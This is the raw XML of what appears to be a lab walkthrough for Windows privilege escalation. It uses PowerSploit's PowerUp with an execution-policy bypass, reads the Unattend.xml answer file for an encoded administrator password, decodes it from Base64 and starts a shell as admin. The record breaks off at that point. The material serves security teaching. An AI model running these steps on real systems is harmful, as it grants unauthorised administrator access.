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1321" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Switch to Attacker Machine for locating a privilege escalation vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F9202" w14:textId="726EB601" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="002A37AD" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C492BB1" wp14:editId="17FE4102">
            <wp:extent cx="5943600" cy="4691380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15896698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69851" name="Picture 15896698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3956" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Open powershell.exe terminal to check the current user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38614D38" w14:textId="180A7F42" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="002A37AD" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C0B6C7" wp14:editId="609C25EE">
            <wp:extent cx="3784795" cy="1168460"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="181891926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19263" name="Picture 18189192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795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20EF" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">We are running as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>a student user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> framework and Powerup.ps1 scripts are provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E83529" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> We will run the powerup.ps1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> script to find privilege escalation vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C328C" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BF7BB" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>cd .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>\Desktop\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>Privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B829A08" w14:textId="2D528824" w:rsidR="002A37AD" w:rsidRPr="00666CA4" w:rsidRDefault="002A37AD" w:rsidP="00666CA4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve"> → means </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>start from the current location</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B96BA" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F23696" w14:textId="2F80B442" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="002A37AD" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77901779" wp14:editId="7CF0520E">
            <wp:extent cx="3530781" cy="2006703"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16542062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06250" name="Picture 16542062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EA3E" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Import PowerUp.ps1 script and Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>PrivescAudit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B0685" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75E66C" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> -ep bypass (PowerShell execution policy bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15895D" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>. .\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01437D3F" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>PrivescAudit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="711368A8" w14:textId="77777777" w:rsidR="00066CF3" w:rsidRDefault="00066CF3" w:rsidP="00666CA4"/>
    <w:p w14:paraId="3B981770" w14:textId="4515044D" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="00666CA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D0871" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9AD38" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve">Runs PowerShell with the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution Policy set to bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D712D6" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:t>Normally, Windows blocks running scripts for security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA7F3F" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve">This tells PowerShell: </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“Ignore restrictions, let me run any script I want.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0761E" w14:textId="3A53D245" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD"/>
    <w:p w14:paraId="1DF03BC3" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. . .\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243159AB" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t>The .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve"> . (dot space dot) means </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the script into memory</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve"> instead of just running it once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61F2E0" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve"> this means: </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">“Load the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> script so I can use its functions.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF67B8" w14:textId="7EE6498A" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD"/>
    <w:p w14:paraId="212AF0DC" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PrivescAudit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0766FACC" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command (function) inside PowerUp.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0138B" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="002A37AD" w:rsidRDefault="002A37AD" w:rsidP="002A37AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve">It runs a full check of the system looking for </w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ways to escalate privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="002A37AD">
        <w:t xml:space="preserve"> (become admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62AFD9" w14:textId="77777777" w:rsidR="002A37AD" w:rsidRPr="00666CA4" w:rsidRDefault="002A37AD" w:rsidP="00666CA4"/>
    <w:p w14:paraId="15287FCE" w14:textId="5E00A36D" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="008D699E" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598A6E9A" wp14:editId="62AAC0E4">
            <wp:extent cx="5524784" cy="2616334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20392039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03940" name="Picture 20392039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B1DE" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>We can notice that there is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unattend.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> file present on the system. Open the </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unattend.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A36130" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Unattend.xml:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD42DD3" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Reading Unattend.xml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EEEB1E" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEB44B" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>cat C:\Windows\Panther\Unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F176547" w14:textId="4961877E" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="008D699E" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D97DA05" wp14:editId="02EAE930">
            <wp:extent cx="5829600" cy="2584583"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="145983284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32842" name="Picture 14598328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258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524C" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">We have discovered an administrator encoded password. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“QWRtaW5AMTIz”</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E83110A" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> Decoding administrator password using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153187F9" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A1F0B" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>$password='QWRtaW5AMTIz'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C5BCB1" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>$password</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>=[System.Text.Encoding]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>UTF8.GetString([System.Convert</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>FromBase64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>String(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>$pa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E4A805" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>ssword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E981C3" w14:textId="77777777" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve">This takes $password (the Base64 string) and </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>decodes it</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> into readable text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923C950" w14:textId="77777777" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4D89">
        <w:t>FromBase64String → converts the Base64 back into bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEFA1A" w14:textId="77777777" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002A4D89">
        <w:t>UTF8.GetString → turns those bytes into normal text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD6A79" w14:textId="77777777" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> So now $password holds the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real password</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A3C88C" w14:textId="12EA722F" w:rsidR="002A4D89" w:rsidRPr="00666CA4" w:rsidRDefault="002A4D89" w:rsidP="00666CA4"/>
    <w:p w14:paraId="430E99DD" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>echo $password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36455E" w14:textId="642ADE45" w:rsidR="002A4D89" w:rsidRPr="00666CA4" w:rsidRDefault="002A4D89" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B78F9E7" wp14:editId="16F2D072">
            <wp:extent cx="4051508" cy="146058"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="11394776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77634" name="Picture 11394776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508" cy="14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D9061" wp14:editId="5876E48D">
            <wp:extent cx="5842300" cy="546128"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="124913239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32398" name="Picture 12491323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300" cy="5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7D26" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>The administrator password is </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Admin@123”</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A390ECB" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> We are running a command prompt as an administrator user using discover credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9627A" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F43CF44" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
